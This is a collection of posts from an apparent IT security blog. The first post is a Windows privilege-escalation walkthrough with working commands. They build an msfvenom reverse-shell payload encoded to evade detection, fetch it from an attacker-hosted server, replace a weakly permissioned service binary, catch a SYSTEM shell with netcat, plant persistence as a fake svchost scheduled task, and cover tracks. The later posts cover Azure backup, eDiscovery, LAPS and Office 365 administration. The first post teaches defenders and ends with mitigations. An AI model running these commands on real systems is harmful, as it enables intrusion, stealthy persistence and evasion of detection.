Abusing Insecure Services to Gain Privilege Escalation and a Remote Shell

With each story of a new, brazen attack on an enterprise or government network by some “sophisticated” threat actor using “novel techniques”, the Twittersphere and public media outlets get whipped into a fear-induced frenzy. Questions about losing some kind of technology-skills arms race and trendy new memes fly around the internet faster than any of us can keep up with. Let’s take a moment to look at a method these “sophisticated” attackers use to elevate and maintain access in their victims’ networks, then use that example to outline what we good guys need to do to make life difficult for anyone trying to exploit this attack vector.

Establishing a Foothold and Performing Reconnaissance

Attackers most commonly gain a foothold by abusing cloud services and pivoting to remote access, by phishing, or with a good ole’ fashioned web drive-by. The method really doesn’t matter, because the reality is that everyone clicks. Eventually someone in your network will be lured into opening an attachment or clicking a link, they will be compromised, and we can’t stop that.

Once the vulnerable user’s system has been compromised, attackers will start to dig for information to map out the rest of the network and identify systems of interest. Once they gain access to one of those systems by exploiting a vulnerability or leveraging stolen credentials, the real fun starts. What’s the big deal, right? They were able to RDP or gain terminal access to a server, but they don’t have the elevated permissions to actually accomplish anything there. We’ll see about that.

Let’s take a look at all of the services running on the machine and which executable each service actually runs, focusing on anything outside of the system directory. The goal here is to identify software that might have been installed in a directory your compromised user can actually write to.
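A quick way to pull that list (a sketch; the filter simply hides anything under the system directory, and the output will obviously vary by machine):

Get-WmiObject win32_service | Where-Object { $_.PathName -notmatch 'C:\\Windows' } | Select-Object Name, PathName, StartName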

Now that we’ve got a list of potential targets, let’s review the permissions on those executables using icacls to see whether we have access to change them. In this particular case, the logged-in user has FullControl (F) on the executable, so we’re in luck!
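The check itself looks like this (the program path is a stand-in for whatever your service enumeration turned up):

icacls "C:\Program Files\VulnApp\vulnsvc.exe"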

Then, from our attack machine (running Kali Linux in this case) we’ll use msfvenom to create a payload that runs a reverse shell once executed. A few things to note here: msfvenom is part of the Metasploit Framework and simplifies the creation of malicious payloads. In this case we’re specifying that we want a reverse shell, which host it should reach out to, on what port, and that we want the payload encoded with shikata_ga_nai to help evade signature-based detection:
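Something along these lines; the LHOST, LPORT, and output name are placeholders for your own lab values:

msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.50 LPORT=4444 -e x86/shikata_ga_nai -f exe -o vulnsvc.exe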

Then we’ll move it over to the html directory to be hosted by the local Apache web server. Apache is installed by default on Kali, so there’s not much magic here:
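On a default Kali install that’s roughly:

sudo cp vulnsvc.exe /var/www/html/
sudo systemctl start apache2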

Then, on the target, we’ll use PowerShell to download the malicious payload from our Apache instance. We’re using PowerShell because it’s native to Windows, and this method works because, unfortunately, administrators often don’t restrict servers’ internet access to known good endpoints:
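A minimal example, with the attacker IP and paths as placeholders:

Invoke-WebRequest -Uri "http://192.168.1.50/vulnsvc.exe" -OutFile "C:\Users\Public\vulnsvc.exe"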

Remembering that our end goal is to abuse an insecure service to gain remote access and an elevated command shell, let’s take the known good executable run by the vulnerable service and rename it. We want to keep it around so we can clean up after ourselves later and hide that we were ever there!
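For example, carrying the same placeholder path forward:

Rename-Item "C:\Program Files\VulnApp\vulnsvc.exe" "vulnsvc.exe.bak"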

And finally, we copy our malicious payload over to replace the original:
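Using the same placeholder paths as before:

Copy-Item "C:\Users\Public\vulnsvc.exe" "C:\Program Files\VulnApp\vulnsvc.exe"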

Great! Now, when the service restarts it’s going to execute our malicious payload, which will reach out to the IP we specified and establish a remote shell running with the permissions the service itself runs as… NT Authority\System!

And of course, on the other end, we need something listening to pick up the shell! Using Netcat, we’ll open a simple listener on the port we specified when we created the malicious payload. With the Netcat listener in place, we’ll reboot the target machine so the service restarts and our payload executes. With the shell established, we can use ‘whoami’ to confirm that we’ve got elevated permissions on the target machine:
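On the Kali side, matching the port from the msfvenom step:

nc -lvnp 4444

Once the session lands, whoami should come back as nt authority\system.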

Finally, using our elevated access, let’s create a little persistence with our remote shell before rolling back the changes to the vulnerable service and deleting the malicious payload, covering our tracks and making it harder to see that we’ve been snooping around:
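One hedged sketch of what that might look like, reusing the placeholder paths from above (persistence options vary wildly; a scheduled task is just one of many):

# stash a copy of the payload under an innocuous name and relaunch it at logon
Copy-Item "C:\Users\Public\vulnsvc.exe" "C:\Users\Public\svchost.exe"
schtasks /create /tn "Updater" /tr "C:\Users\Public\svchost.exe" /sc onlogon /ru SYSTEM

# then roll the service back to the original binary and remove the download
Move-Item "C:\Program Files\VulnApp\vulnsvc.exe.bak" "C:\Program Files\VulnApp\vulnsvc.exe" -Force
Remove-Item "C:\Users\Public\vulnsvc.exe"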

Why was this so easy, and what can we do to protect ourselves from these types of attacks?

Well, the first and most obvious thing here is to make sure that our servers only run software core to the functionality of the server. Leaving administrative tools in place leaves a vulnerable footprint attackers can easily exploit. Tools like Wireshark or VMware Tools can make administrative work more convenient, but they often go unpatched and make our lives more difficult in the long run.

Obviously we need to patch our systems. But that doesn’t just mean Windows patches; it means EVERY piece of software on the system. Public exploit databases turn the software running on your servers into a menu of juicy targets. Our vulnerable service may well have been fixed in a recent patch!

Then finally, our servers should not be able to reach out to internet locations that are not explicitly trusted. Known public cloud services, Windows Update, threat monitoring tools, and other cloud-hosted management services should be the only places servers are able to access. With that in place, initial access would have been significantly more complicated, and our reverse shell would not have worked at all.

Protect Yourself From Ransomware With Azure System State Backup

With 2020 came a seemingly biblical stream of plagues: COVID-19, murder hornets, social unrest, and… ransomware. Sure, ransomware isn’t a terribly new concept, but this year the bad guys have upped the ante significantly. Not only have crime groups become more brazen, they’re demanding far bigger ransoms, leaving cyber insurance companies and their unfortunate customers struggling.

There are a million things companies need to consider when it comes to protecting their infrastructure from ransomware, and maybe we’ll dive in further later, but today we’re going to spend some time talking about what you can do to make sure you’re able to recover when every domain controller in your organization has been paved over by ransomware or destructive malware.

As you scream ‘But I have backups!’, you might want to stop for a second and think about those backups. Are they performed with an account that has access to everything else (I hope not)? Are the backups themselves stored somewhere that’s susceptible to being encrypted? And how long will it take you to actually restore them?

Azure System State Backup

Taking advantage of Azure System State Backup is a great way to address those concerns. The primary benefits: the solution involves a simple agent installed on a domain controller, it doesn’t involve credentials of any kind, the backups are stored offsite, and those backups are protected from tampering by a host of enhanced security features.

So let’s talk about configuration. Since we’re configuring a critical resource, work from a PAW (you ARE using PAWs, right?). First, we need to make sure that a Recovery Services vault is available in Azure.
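If you’d rather script it than click through the portal, the Az PowerShell module can create one (the names and region here are examples):

New-AzRecoveryServicesVault -Name "rsv-backup" -ResourceGroupName "rg-backup" -Location "eastus2"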

Then, in that recovery services vault we’ll configure a backup:

Since a domain controller backup only involves the system state, it’s a simple configuration. A system state backup ensures that SYSVOL and registry configuration are retained.

Then, when prompted, download the MARS agent, move it to the domain controller, and start the install. The agent requires the Visual C++ runtime, so if it’s not already installed, setup will take care of that for you.

Then select where you’d like the agent to be installed:

Backups are shipped to Azure over encrypted, outbound connectivity initiated by the MARS agent. If you’d like to proxy that connectivity, configure it next.

Make sure that the agent is configured to be able to update itself moving forward:

Then, finish the installation and the agent will prompt you to register it.

To register the agent, you’ll need to go back to the backup you configured in Azure and, in the properties of the backup, ensure that you’ve declared you’re using the latest MARS agent, download the vault credentials, and transfer them to the domain controller you’re working on.

Select the previously exported credentials and move forward:

Next, you’ll need to generate a passphrase that will be used when restoring the backup. You can either specify your own or let setup generate one for you. Select Browse and choose where you’d like to export that passphrase. Protect it well, because you won’t be able to restore if the secret is lost. Azure Key Vault (which we’ll talk about at a later date) is a great option here.

Now that registration is complete, you’ll want to schedule your backups. Open the Azure Backup agent and on the right side, select ‘Schedule Backup’.

Since we’re only backing up the system state, select ‘Add Items’ and ‘System State’.

Finally, ensure you’re taking daily backups, and then we’ll take a look at retention of those backups.

Retention depends entirely on your RTO/RPO strategy, but restoring a domain to a point too far in the past typically has little value. I’ve chosen to perform daily backups and retain them for 14 days, but you might find it more reasonable to maintain only 7 days of daily backups, plus maybe 4 weekly backups to be used in fringe cases.

Finally, we confirm that the schedule is what we need it to be and move forward through the setup.

So there you have it. Nothing complicated at all, and we touched on a handful of topics we’ll pick up later, but we’ve done some good work! Too often, people use complicated or expensive backup/storage solutions that put them at risk of credential theft or data destruction in worst-case scenarios. Azure System State Backup is neither expensive nor complicated, and it ensures that you’ll be able to quickly and confidently recover from disaster.

eDiscovery in Office 365

Now that we’ve spent a few minutes going over data retention and destruction in the service to make sure you’re retaining the data you’re obligated to keep, let’s take a bit of time to make sure you’re able to quickly and reliably identify information. Why? Because there are times when you’ll need to export copies of data for legal reasons, delete phishing attempts, or just find out whether a message was read by someone.

I’ll spend time outlining the PowerShell syntax in the examples here to help cut down on human error. Most people who are averse to using the command line are usually uncomfortable because the syntax is difficult to remember or the process seems arcane. It’s often beneficial to leverage the shell for discovery so you can be more granular with your searches and reduce the cost of first-pass litigation review by outside counsel (the numbers are scary). It also lets you efficiently document the search syntax, which ensures reliable internal knowledge transfer and simplifies repeated searches by allowing the person performing the search to copy/paste the actual commands.

Before you’ll even be able to connect to the service via PowerShell, you’ll need to make sure that you have the right level of permission. With RBAC (Role-Based Access Control) it’s possible to scope permissions within the compliance center so that eDiscovery is granted only to individuals who may not need access to things like email security settings or the audit log. In most cases the eDiscovery Administrator role will be enough for discovery activities, but if those individuals also need to purge data, they’ll need the “Search and Purge” role as well, which, by default, is only part of the Organization Management role group. A little more information on those permissions can be found here, along with a quick reference on how to assign role group members to a role. And since it’s easy for an attacker to use eDiscovery to exfiltrate data, don’t forget to require multifactor authentication for anyone with eDiscovery permissions!

Now that you’ve got the permissions taken care of and we’ve touched on ensuring MFA is enabled, you’ll need to connect to the Security and Compliance Center using the Exchange Online PowerShell module.
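If the module isn’t already present, grab it from the PowerShell Gallery first:

Install-Module -Name ExchangeOnlineManagement

Once the module is installed, it’s just a simple one-line command to connect: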

Connect-IPPSSession -UserPrincipalName matt@collab-crossroads.com

Once you’re connected, the syntax is simple. We’ll be working with the New-ComplianceSearch command to identify the potentially malicious message below:

The search syntax is simple. We know the message we want to identify was sent on 4/4 and has ‘Test’ in the subject. We’re not sure who else might have received this particular message, so we’ll check every mailbox in the organization by using ‘All’ for the Exchange location. The search is Boolean, so there are a couple of gotchas now and then. In this case, note the parentheses around the sent-date range. We need to make sure those conditions are evaluated together first, so we put them in a block before moving on to the simpler keyword search in the subject. We won’t get into the complexities of grouping here; just know that it works like simple math: what’s in parentheses is evaluated first.

New-ComplianceSearch -Name "Test Search" -ExchangeLocation all -ContentMatchQuery '(sent>=04/01/2019 AND sent<=04/05/2019) AND subject:"Test"'

Once you’ve created the search, start it using:

Start-ComplianceSearch "Test Search"

Depending on how complex the search is, it might take a while to complete. In our case it’s a single message in a single mailbox, so it completes very quickly, and you can see the results using:

Get-ComplianceSearch "Test Search"

There are a number of really handy metrics that Exchange reports on that you might be interested in from time to time. The obvious ones are who started the search, whether it’s complete, how long it took, and how many items were found.

If you pipe the Get-ComplianceSearch command to Format-List (FL), it will format the results as a list and show you everything you can select from. Since we only want a subset, you can select specific properties from the results of the previous command.
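For example, picking a few of the more useful properties:

Get-ComplianceSearch "Test Search" | Format-List
Get-ComplianceSearch "Test Search" | Select-Object Name, Status, Items, JobStartTime, JobEndTime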

Now that we’ve confirmed the results are what we were looking for, we can take action on them using the New-ComplianceSearchAction command. Before choosing to delete anything, always make sure to preview and export a copy.
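Roughly like this, using the parameters discussed next:

New-ComplianceSearchAction -SearchName "Test Search" -Preview
New-ComplianceSearchAction -SearchName "Test Search" -Export -EnableDedupe $true -ArchiveFormat PerUserPst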

A couple of things to note here: first, we’re deduplicating results in the export with the -EnableDedupe parameter. Next, we’re exporting one PST per mailbox the results are in, using the -ArchiveFormat parameter. Since the compliance center temporarily stores the export in Azure blob storage, it’s not possible to download the export through PowerShell, so we’ll go into the compliance center to actually download it. Under Search and Investigation and Content Search you’ll see the search we just created; selecting the Exports tab will show the export as well:

Since Chrome doesn’t support ClickOnce, you’ll need to use Internet Explorer to install the small agent required to download the export. After clicking the “Download results” button within the export request, you’ll be prompted to install the agent. Then you’ll be prompted for the export key shown below, as well as an export location to save your export.

Now that we’ve made sure that we’re deleting the right content and have a copy of it, let’s go ahead and delete it. The New-ComplianceSearchAction command is used here as well:

 New-ComplianceSearchAction -SearchName "Test Search" -Purge -PurgeType SoftDelete -confirm:$False 

You can then verify that the action completed using the Get-ComplianceSearchAction command and confirm that the message in question was indeed removed:
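The purge action’s name is derived from the search name:

Get-ComplianceSearchAction -Identity "Test Search_Purge"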

In this scenario we focused on deleting a potentially malicious email (phishing, malware, or a malicious insider) from mailboxes. The process of exporting data for a litigation search is identical, except that you’re not actually deleting the data. Next time we’ll take a look at using the Threat Explorer to accomplish the same activity!

Unique Local Admin Passwords – How and Why.

So here we are in early 2019, just a few months removed from a data breach at Marriott that saw over 500 million guests’ personal information hit the public internet. If that sounds like an insane number, you’re absolutely right! That’s nearly 6% of the world population, and about 150% of the population of the US.

So the big question is how. How do things like this happen, how do attackers gain so much information, how do they exfiltrate the data, and how is it so common that Forbes is over here making cyber predictions for 2019!?

A while back I wrote about securing privileged access, with a brief, high-level overview of how an attacker works to gain access in an organization and then keep it. Part of that process is making use of local admin credentials harvested from the first compromised machine to pivot around the network and see what else those credentials work on. Sounds harmless enough, but what if the machine they gain access to is a domain controller? Or the workstation of an admin who happens to have administrative privileges on his daily account?

Security_killchain

This activity is difficult to detect because the attacker is using valid credentials to pivot around the network, digging for more information or waiting for an admin to slip up. The first step to stopping it is attacking the first link in the kill chain and limiting privilege escalation on other workstations. How? By making sure that no other workstation has the same local administrative password as the one the attacker already controls.

Enter LAPS! The first part of the solution involves deploying an agent to each workstation and server on the network. That agent can be downloaded here. Since Microsoft was kind enough to provide the package as an MSI, it’s easy enough to deploy with a script (msiexec /i \\fileserver\share\LAPS.x64.msi /quiet), with Intune if you’re into co-management, or with good ole’ fashioned SCCM. Definitely be sure to update your images to include the agent as well! Once that’s deployed and imaging has been updated, admins need to run the installer on their PAWs (you are using privileged access workstations, right?) to get the management client, PowerShell module, and GPO templates for management.

LAPS_AdminInstall

The next step is to make sure the Active Directory schema is taken care of. We need to extend the schema to include the attributes we’ll be working with, and then update permissions to account for users who shouldn’t be able to see those attributes. To extend the schema, use one of the admin workstations we just installed the management tools on, import the module in a PowerShell session, and update the schema:

Import-module AdmPwd.PS
Update-AdmPwdADSchema

LAPS_SchemaExtension

After waiting a short while for that schema change to replicate, we’ll move on to making sure only specific users and computers have access to the AD attribute that now stores these passwords. The first step is to remove permissions for groups at the OU level. If you’ve blocked inheritance, you’ll need to take care of any nested OUs as well.

  1. Open ADSIEdit
  2. Right Click on the OU that contains the computer accounts that you are installing this solution on and select Properties.
  3. Click the Security tab
  4. Click Advanced
  5. Select the Group(s) or User(s) that you don’t want to be able to read the password and then click Edit.
  6. Uncheck All extended rights

*Be sure to review all extended rights permissions first to make sure you aren’t removing permissions required by that group of users

LAPS_Security1

Now that we’ve scoped permissions away from unintended users and computers, we need to make sure that the machines themselves have access to write to this attribute so they’re able to update their own passwords as they expire:

Set-AdmPwdComputerSelfPermission -OrgUnit "OU=Servers,DC=domain,DC=com"

LAPS_Security2

We’ll grant individual admin groups access to read those randomized admin passwords:

Set-AdmPwdReadPasswordPermission `
-OrgUnit "OU=Admins,DC=domain,DC=com" `
-AllowedPrincipals Domain\PasswordAdmins

And of course we need to account for password resets as well so let’s add reset permissions:

Set-AdmPwdResetPasswordPermission `
-OrgUnit "OU=Admins,DC=domain,DC=com" `
-AllowedPrincipals Domain\PasswordAdmins

Finally, you’ll want to hop into Group Policy on that admin workstation you installed the tools on to establish the password policy settings you’ll be enforcing on those workstations and servers.

LAPS_GroupPolicy

There’s quite a bit here to chew on, but it’s not technically challenging, so give it a try in a lab, then roll it out to your user workstations and eventually your servers as well! Again, the idea here is to limit lateral movement and make elevation of privilege more and more difficult for bad actors.

We’ll have another shorter session to go over some of the day to day admin tasks like looking up those passwords and resetting them, but that day is not today!

Securing Privileged Access – Part 1

After a bit of a holiday hiatus, we’re back to start a segment on securing privileged access. When we refer to privileged access, we’re talking about everything from the different levels of administrative access to privileged users who might handle extremely sensitive data for your organization.

So many organizations still believe that traditional firewalls are enough to keep the big, bad internet at bay. In the modern enterprise it’s foolish to believe you can keep your data within any boundary while your users work remotely, leverage third-party SaaS storage (Dropbox, Google Drive, OneDrive, etc.), or you host your data in an enterprise cloud like Office 365. I’m not here to tell you that those firewalls aren’t absolutely necessary, but it’s important to realize that the days of treating your firewall as the security boundary are over, and you need to work hard to secure identity, regardless of where your data is hosted.

Recognizing that, let’s take a look at how a typical credential theft takes place in an organization:

Privsec_CredentialTheft

An attacker is going to establish a foothold in your organization by targeting end users with social engineering or phishing attacks. Once they’ve got access to that user’s computer, they’ll start working on lateral movement, meaning that they’ll begin reaching out to other computers or servers on the network to see what else can be compromised. Maybe it’s by exploiting non-unique local admin passwords, maybe the originally breached user has access elsewhere, or maybe an admin isn’t using a separate account for admin activities. They keep pivoting further and further until they gain control of the directory database, whether through actual domain admin permissions, exploited misconfigurations, or server agent configurations.

Privsec_Stage1

The first step is a simple one, and in many organizations it’s already very well ingrained in IT culture: administrators need dedicated administrative accounts that are not shared with any other admins. I work with too many customers where this isn’t the case. Some have a generic account with domain admin rights that’s used for automation or just ‘general use’, or they flat out grant admin permissions to day-to-day accounts. Admin roles in your org should be reported on regularly to identify these, and there should be alerts for elevation of privilege, with an actual process for following up on them.

The next steps are, again, not technically challenging, but they require culture change that many admins are averse to. Privileged Access Workstations need to be deployed for users holding high-value admin roles, and unique local admin passwords need to be rolled out, first to workstations and finally to servers, to help stop lateral movement. I’ll come back to these two topics later with dedicated articles; for now, know that they need to be accomplished and prioritized.

Now that we’ve touched on high level goals of attackers and the first steps required to secure privileged access, I’ll follow up soon with part two. I’ll be working through Microsoft guidelines published here so definitely feel free to read ahead a little and ask questions!

Managing Major Changes to Office 365

Admins are expected to keep tabs on major changes to the service and understand how those changes could impact uptime, or just good ole’ fashioned end user experience. Unfortunately, there are hundreds of items coming down the pipe that may or may not be relevant to each organization, and it’s difficult to follow it all.

The first part of making that manageable is understanding how Microsoft’s release options work. Updates are released to different update ‘rings’ as they mature. The first three rings are internal to Microsoft, where Microsoft teams consume the updates first, before they’re formally released to the rest of the world.

M_O365_UpdateRings

After that, you can choose to add friendlies to the targeted release group. These would typically be IT groups or power users who will be a little more adaptive to change. Here are a few of the benefits of making sure you have decision makers in the targeted release group:

  • Test and validate new updates before they are released to all users in the organization.
  • Prepare user notifications and documentation before updates are released worldwide.
  • Prepare the internal help desk for upcoming changes.
  • Go through compliance and security reviews.
  • Use feature controls, where applicable, to control the release of updates to end users.

Here’s how you can add individuals to targeted release.

Handy, right? Here’s a super common use case: Teams was released about a year ago, and most customers had no idea exactly how it would impact them or how their users would cope. The feature was added to enterprise licensing and enabled by default upon standard release. The trouble? End users could go to http://teams.microsoft.com and create a new team with any name and any picture, which would show up in the address book with (at the time) no central management, and could potentially be shared with the wide world of the internet. Mayyyybe you might want to review a feature like that to make sure you have controls in place that match your organization’s goals.

Facepalm

In addition to release options, you’ll want to make sure that your team is monitoring the message center for major updates.

M_O365_MessageCenter

Updates in the service come at you pretty fast, but Microsoft does a pretty decent job of providing information and letting you plan for them. Make sure you keep an eye on the roadmap and the message center, and of course make use of targeted release to find out how those changes will impact your users!

Now don’t mind me while I go drown myself in meaningless college football games!


The Journey Begins

And here we are at the Crossroads of collaboration and productivity. With this little ditty I’ll make my foray into the wild, wild world of technical blogging.

I’ve been lucky enough to become an established engineer and, over the last ten years, to claim some of the most iconic brands and organizations in the world as my customers. My goal is to share some of the knowledge I’ve gained along the way, hopefully with a bit of a smile as well.

Here you’ll find tips, tricks, and news about technical collaboration solutions used by organizations today. Everything from specific script samples, deployment guidance, and migration scenarios to major news released by industry leaders.

I’ll start with the message that struck me quite a while back and hope it does the same for you. Steve Jobs paid it forward to the graduates of Stanford University in 2005 when he sent them off into the world with four words: Stay hungry, stay foolish.

For those of you who don’t recognize the reference, Steve was quoting the closing message of The Whole Earth Catalog. His message was one of ambition, living life, and embracing risk.

Education begins the gentleman, but reading, good company, and reflection must finish him. – John Locke
